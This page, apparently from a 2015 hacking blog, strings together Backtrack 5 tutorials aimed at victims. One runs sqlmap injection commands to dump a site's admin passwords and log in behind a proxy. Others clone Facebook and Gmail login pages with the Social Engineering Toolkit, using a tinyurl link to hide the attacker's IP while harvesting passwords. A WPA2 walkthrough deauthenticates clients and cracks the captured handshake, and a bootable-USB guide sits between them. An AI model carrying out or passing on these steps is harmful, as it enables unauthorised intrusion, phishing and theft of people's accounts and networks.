Tuesday, 28 July 2015

Hack Any WEbsite Using Backtrack 5

Hack Website Using Backtrack (Sqlmap)
SiddhartH SolankI 05:00
In my previous tutorial I have explained what is backtrack, now in this tutorial I am going to show you how to hack website using Backtrack 5 (sqlmap). Sqlmap is a automatic sql injection tool which helps you to hack website easily. Follow the simple steps to hack website using backtrack 5 sqlmap tool.

1. Open your backtrack terminal and type cd /pentest/database/sqlmap and hit enter. Now sqlmap is open in your terminal [sql map 1]
2. Now find the vulnerable site. (well I already have vulnerable site)
[sql map 2]
3. Now type this command in the terminal and hit enter.(refer above figure)
python sqlmap.py -u http://yourvictim'slink/index.php?id=4 –dbs

4. Now you will get the database name of the website
[sql map 3]
Well I got the two database aj and information_schema we will select aj database.

5. Now get the tables of that database. for that you need to enter this command into your terminal and simply hit Enter.
python sqlmap.py -u http://yourvictim'slink/index.php?id=4 -D  (database name) –tables

6. Now we need to grab the tables from the aj database. paste this command bellow command and hit enter.
python sqlmap.py -u http://www.yourvictim'slink.com/index.php?id=4 -D aj –tables

[sql map 4]
7. Now you will get the tables list which is stored in aj database.
[sql map 5]

8. Now lets grab the columns from the admin table
python sqlmap.py -u http://www.yourvictim'slink.com/index.php?id=4 -T admin --columns
[sql map 7]
Now we got the columns and we got username and password
9. Now lets grab the passwords of the admin
python sqlmap.py -u http://www.yourvictim'slink.com/index.php?id=4 -T admin -U test --dump
Now we got the username and the password of the website !
[sql map 9]
Now just find the admin penal of the website and use proxy/vpn when you are trying to login in the website as a admin.


How to create a bootable USB for Backtrack-5 & Kali linux as you wish

Make a Bootable USB for Backtrack 5
 12:39   Muhammad Hamza   3 comments
Hey Folks. My Past articles showed how to make a Bootable USB for Windows XP and Make a Bootable USB for Windows 7.
Here I come up with another article in which I'm gonna show you how to make a bootable USB for Backtrack 5. Before leading to the executing process let me introduce Backtrack 5.
Backtrack is based on Ubuntu Lucid (10.04 LTS) with Linux kernel 2.6.38 and some WiFi drivers to allow injection attacks. It is currently most popular choice among hackers for pen testing. It is filled with a collection of more than 3000 open source security tools, which are organised in a real decent way.
It menu consists of several tools like  “Information Gathering”, “Vulnerability Assessment”, “Exploitation Tools”, “Privilege Escalation”, “Maintaining Access”, “Reverse Engineering”, “RFID Tools”, “Stress Testing”, “Forensics”, “Reporting Tools”, “Services”, and “Miscellaneous”.
Alright Lets get start to get hands on such powerful OS:
First grab a copy of the latest version of Backtrack. go to the official site click here
Click on Download tab, either register your copy or directly click on Download button
Then configure the version according to your need and requirement. Click on Download
In order to make bootable USB we are going to use a small freewareUNETBOOTIN. Download it from here
Take a 4GB USB (recommended) backup all its data and make a QuickFormat using FAT32 File System
Now run the application unetbootin
Configure it: In Diskimage, select ISO.
Click browse and select the IMAGE which you just downloaded
 In Type select USB Drive, Drive select your USB drive letter
 Leave the rest as default.
 You are always free to configure it in your way :)
Click OK
Finally the burning process begins. It generally takes 5-10 mins but may take longer depending upon your system configuration.
When its done hit the Reboot button of your system.
Switch to BIOS and select the USB as First boot device.
Viola its done now you can get rid off from Virtual Machine because it slows down the speed in my case. Run the Backtrack directly on your machine.

"The quieter you become, the more you are able to hear"

BACKTRACK SERIES, HACKING, PHISHING, SOCIAL NETWORKING, WEB HACKING Hack FaceBook,Gmail,Yahoo

How to Hack Facebook Accounts with Backtrack 5
Technology
Hacking
Linux
Tutorial
Step 1 : Open set Tool in Backtrack 5 : To open it follow the step shown above .
Step 2: Time to set the Website Attack Vectors : Below Menu   enter your choice : 2.Website Attack Vectors and press Enter .

Step 3: Select your Attacking Method , Here i choose
3. Credential Harvester Attack Method.

Step 4 : Select Attack Vectors :write  2. Site Cloner and press enter as shown in the image .

Step 5: Enter the Url: To make a clone to facebook login page I enteredhttps://www.facebook.com and press enter . As I press enter it will automatically generate a clone page .

Step 6 : To continue the process you have to put * sign and press enter.

Step 7 : Process will continue as shown in the image above .

Step 8: Open terminal and enter ifconfig command . It will shown your ip address . Now copy the ip address .


Step9 :Open Web Browser and  Paste the system ipaddress into Address bar and it will redirect to the facebook login page .
Now Enter your anything to check it will work or not .
FOR EXAMPLE: Here I use
Email: h4x00r
Password:hackingDNA.com

And Press Enter . Let see what happen on the Next step .


Step 10: In step 7 the process start you remember now when you follow step 8 and step 9  ,then it will come up with  all the details of Username and Password .

This is how we set a trap and hack victim facebook and password only onBacktrack 5

Enjoy!

HACK GMAIL PASSWORD USING CREDENTIAL HARVESTER ATTACK

Hello guys today in this post we will see how to hack gmail password using Credential Harvester Attack Vector of Social Engineering Toolkit. This method is same as the tabnabbing attack.
The first thing is that this attack is only work on a same network or company that we need to do the Social Engineering Attack. This method is also called phishing attack within same network. In this method we use to clone the site and send to victim and request or assist the users to submit their login details and passwords to popular websites. Now I will show you how it works….

Step 1 :- First of all you run your backtrack system then open the Social Engineering Toolkit in BackTrack and choose Website Attack Vectors option.
Backtrack – Exploitation Tools – Social Engineering tools – Social Engineering Toolkit – set.
  [hack gmail password]

Step 2 :- Then choose option 1 i.e Social Engineering – attack
  [hack gmail password]

Step 3 :- Then choose  option  2 i.e Website Attack Vectors
  [hack gmail password]
Step 4 :- then select 3 option credential Harvester Attack
[hack gmail password]
Step 5 :- select option 2 “site clone”
  [hack gmail password]
Step 6:- using ifconfig command to see the ip attrack of  your machine i.e attacker system ip address.
[hack gmail password]
  Step 7 :- Now put the ip address where the victim post back the request and choose  the website name for cloning like www.gmail.com
  [hack gmail password]


Step 8:- Now we send a link with our IP address to our victim and request him/her to open that  ip/url opens.
You can also use tinyurl to hide the ip address of attacker…. Or there is also so many method available to request the victim to open their url..
  [hack gmail password]
Then after the Fake website will load and we just have to wait to enter his credentials in order to capture them.

Here you successfully find the user id and password of victim machine
[hack gmail password]

How To Hack Any Wifi Using Bt-5 Or Kali linux

Cracking a WPA or WPA2 wireless network is more difficult than cracking a WEP protected network because it depends on the complexity of the wireless password and on the attack method (Dictionary Attack or Brute Force Attack). Here you will learn step by step instructions how to crack WPA2 wifi password which uses a pre-shared keys (PSK) of a wireless network. This also applies to WPA secured network.
Here are the basics steps we will be going through:
Step 1 :-  airmon-ng
Step 2 :-  airmon-ng wlan0
Step 3 :- airmon-ng start wlan0
  [how to crack WPA2 wifi password]
Step 4 :-  airodump-ng mon0
  [how to crack WPA2 wifi password]
 Wait for some time for all the networks to load then press Ctrl+C to stop the updates. Now choose the wireless network that you wish to crack which has “WPA” or “WPA2″ encryption in the “ENC” column, and “PSK” in the “AUTH” column. “OPN” means that the network is open and you can connect to it without a key, WEP will not work here. After selecting the network that you want to crack take note of the BSSID, and the channel (CH) values.
Step 5 :- airodump-ng –c 6 –bssid 1C:7E:E5:32:1D:54  –w      crack1 mon0
  [3]
  [4]
Step 6 :- aireplay-ng -0  0 –a 1c:7E:E5:32:1D:54  -c    00:21:5C:50:DE:2D mon0
  [5]
  [6]
Step 6 :- aircrack-ng –w /pentest/wireless/aircrack-ng/test/password.list  crack1.cap